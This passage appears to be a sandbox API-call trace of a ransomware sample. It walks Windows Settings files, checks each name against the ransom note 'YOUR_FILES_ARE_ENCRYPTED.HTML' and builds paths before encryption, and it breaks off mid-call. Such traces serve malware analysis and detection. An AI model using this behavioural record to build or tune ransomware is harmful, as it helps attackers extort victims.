returned 1 [0121.606] StrStrIW (lpFirst="AAA_SettingsPagePCSystemInfo.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.606] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemInfo.settingcontent-ms") returned 173 [0121.606] PathFindExtensionW (pszPath="AAA_SettingsPagePCSystemInfo.settingcontent-ms") returned=".settingcontent-ms" [0121.606] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.606] PathFindExtensionW (pszPath="AAA_SettingsPagePCSystemInfo.settingcontent-ms") returned=".settingcontent-ms" [0121.606] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd63fe7d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xd63fe7d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x444, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePCSystemShellMode.settingcontent-ms", cAlternateFileName="AA5C62~1.SET")) returned 1 [0121.607] StrStrIW (lpFirst="AAA_SettingsPagePCSystemShellMode.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.607] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemShellMode.settingcontent-ms") returned 178 [0121.607] PathFindExtensionW (pszPath="AAA_SettingsPagePCSystemShellMode.settingcontent-ms") returned=".settingcontent-ms" [0121.607] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.607] PathFindExtensionW (pszPath="AAA_SettingsPagePCSystemShellMode.settingcontent-ms") returned=".settingcontent-ms" [0121.607] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb049b8, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xdb049b8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x449, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms", cAlternateFileName="AA1248~1.SET")) returned 1 [0121.607] StrStrIW (lpFirst="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.607] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms") returned 179 [0121.607] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms") returned=".settingcontent-ms" [0121.607] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.607] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms") returned=".settingcontent-ms" [0121.607] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde42e1a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xde42e1a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePrivacyCalendar.settingcontent-ms", cAlternateFileName="AA017B~1.SET")) returned 1 [0121.608] StrStrIW (lpFirst="AAA_SettingsPagePrivacyCalendar.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.608] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyCalendar.settingcontent-ms") returned 176 [0121.608] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyCalendar.settingcontent-ms") returned=".settingcontent-ms" [0121.608] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.608] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyCalendar.settingcontent-ms") returned=".settingcontent-ms" [0121.608] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe61a652, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xe61a652, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x449, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms", cAlternateFileName="AA415E~1.SET")) returned 1 [0121.608] StrStrIW (lpFirst="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.608] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyCallHistory.settingcontent-ms") returned 179 [0121.608] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms") returned=".settingcontent-ms" [0121.608] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.608] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms") returned=".settingcontent-ms" [0121.608] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7e41e2, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xe7e41e2, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePrivacyContacts.settingcontent-ms", cAlternateFileName="AA1DE6~1.SET")) returned 1 [0121.608] StrStrIW (lpFirst="AAA_SettingsPagePrivacyContacts.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.608] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyContacts.settingcontent-ms") returned 176 [0121.608] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyContacts.settingcontent-ms") returned=".settingcontent-ms" [0121.608] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.608] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyContacts.settingcontent-ms") returned=".settingcontent-ms" [0121.608] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedb3e67, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xedb3e67, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2391d733, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x467, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms", cAlternateFileName="AA090F~1.SET")) returned 1 [0121.608] StrStrIW (lpFirst="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.608] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms") returned 185 [0121.608] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms") returned=".settingcontent-ms" [0121.608] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.608] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms") returned=".settingcontent-ms" [0121.608] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf52c076, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xf52c076, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePrivacyEmail.settingcontent-ms", cAlternateFileName="AA7C3F~1.SET")) returned 1 [0121.608] StrStrIW (lpFirst="AAA_SettingsPagePrivacyEmail.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.608] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyEmail.settingcontent-ms") returned 173 [0121.608] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyEmail.settingcontent-ms") returned=".settingcontent-ms" [0121.608] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.608] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyEmail.settingcontent-ms") returned=".settingcontent-ms" [0121.608] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcc5962, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xfcc5962, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x435, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePrivacyGeneral.settingcontent-ms", cAlternateFileName="AA9864~1.SET")) returned 1 [0121.608] StrStrIW (lpFirst="AAA_SettingsPagePrivacyGeneral.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.608] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyGeneral.settingcontent-ms") returned 175 [0121.612] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyGeneral.settingcontent-ms") returned=".settingcontent-ms" [0121.612] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.612] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyGeneral.settingcontent-ms") returned=".settingcontent-ms" [0121.612] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x101b08a7, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x101b08a7, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePrivacyLocation.settingcontent-ms", cAlternateFileName="AAD632~1.SET")) returned 1 [0121.612] StrStrIW (lpFirst="AAA_SettingsPagePrivacyLocation.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.612] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyLocation.settingcontent-ms") returned 176 [0121.612] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyLocation.settingcontent-ms") returned=".settingcontent-ms" [0121.612] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.612] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyLocation.settingcontent-ms") returned=".settingcontent-ms" [0121.612] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1051e0e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1051e0e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43f, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePrivacyMessaging.settingcontent-ms", cAlternateFileName="AA8919~1.SET")) returned 1 [0121.612] StrStrIW (lpFirst="AAA_SettingsPagePrivacyMessaging.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.613] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyMessaging.settingcontent-ms") returned 177 [0121.613] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyMessaging.settingcontent-ms") returned=".settingcontent-ms" [0121.613] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.613] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyMessaging.settingcontent-ms") returned=".settingcontent-ms" [0121.613] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x107f285a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107f285a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x444, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms", cAlternateFileName="AAE799~1.SET")) returned 1 [0121.613] StrStrIW (lpFirst="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.613] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyMicrophone.settingcontent-ms") returned 178 [0121.613] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms") returned=".settingcontent-ms" [0121.613] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.613] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms") returned=".settingcontent-ms" [0121.613] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10de8730, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10de8730, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x444, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePrivacyMotionData.settingcontent-ms", cAlternateFileName="AAF2F8~1.SET")) returned 1 [0121.613] StrStrIW (lpFirst="AAA_SettingsPagePrivacyMotionData.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.613] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyMotionData.settingcontent-ms") returned 178 [0121.613] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyMotionData.settingcontent-ms") returned=".settingcontent-ms" [0121.613] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.613] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyMotionData.settingcontent-ms") returned=".settingcontent-ms" [0121.613] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1102b950, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1102b950, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms", cAlternateFileName="AACED3~1.SET")) returned 1 [0121.613] StrStrIW (lpFirst="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.613] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyPersonalization.settingcontent-ms") returned 183 [0121.613] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms") returned=".settingcontent-ms" [0121.613] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.613] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms") returned=".settingcontent-ms" [0121.613] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x112871d0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x112871d0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x430, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePrivacyRadios.settingcontent-ms", cAlternateFileName="AAC1C7~1.SET")) returned 1 [0121.613] StrStrIW (lpFirst="AAA_SettingsPagePrivacyRadios.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.613] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyRadios.settingcontent-ms") returned 174 [0121.613] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyRadios.settingcontent-ms") returned=".settingcontent-ms" [0121.613] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.613] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyRadios.settingcontent-ms") returned=".settingcontent-ms" [0121.613] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1149d5d9, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1149d5d9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44e, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms", cAlternateFileName="AA247E~1.SET")) returned 1 [0121.613] StrStrIW (lpFirst="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.613] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms") returned 180 [0121.613] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms") returned=".settingcontent-ms" [0121.613] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.613] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms") returned=".settingcontent-ms" [0121.613] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11666fba, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x11666fba, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x430, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePrivacyWebcam.settingcontent-ms", cAlternateFileName="AA907A~1.SET")) returned 1 [0121.614] StrStrIW (lpFirst="AAA_SettingsPagePrivacyWebcam.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.614] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyWebcam.settingcontent-ms") returned 174 [0121.614] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyWebcam.settingcontent-ms") returned=".settingcontent-ms" [0121.614] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.614] PathFindExtensionW (pszPath="AAA_SettingsPagePrivacyWebcam.settingcontent-ms") returned=".settingcontent-ms" [0121.614] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118309de, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x118309de, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x462, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms", cAlternateFileName="AAB4D2~1.SET")) returned 1 [0121.614] StrStrIW (lpFirst="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.614] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms") returned 184 [0121.614] PathFindExtensionW (pszPath="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms") returned=".settingcontent-ms" [0121.614] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.614] PathFindExtensionW (pszPath="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms") returned=".settingcontent-ms" [0121.614] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11e72c7e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x11e72c7e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43f, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms", cAlternateFileName="AAD392~1.SET")) returned 1 [0121.614] StrStrIW (lpFirst="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.614] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreMusUpdate.settingcontent-ms") returned 177 [0121.614] PathFindExtensionW (pszPath="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms") returned=".settingcontent-ms" [0121.614] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.614] PathFindExtensionW (pszPath="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms") returned=".settingcontent-ms" [0121.614] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x127099fd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x127099fd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43f, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageRestoreOneBackup.settingcontent-ms", cAlternateFileName="AAC14A~1.SET")) returned 1 [0121.614] StrStrIW (lpFirst="AAA_SettingsPageRestoreOneBackup.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.614] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreOneBackup.settingcontent-ms") returned 177 [0121.614] PathFindExtensionW 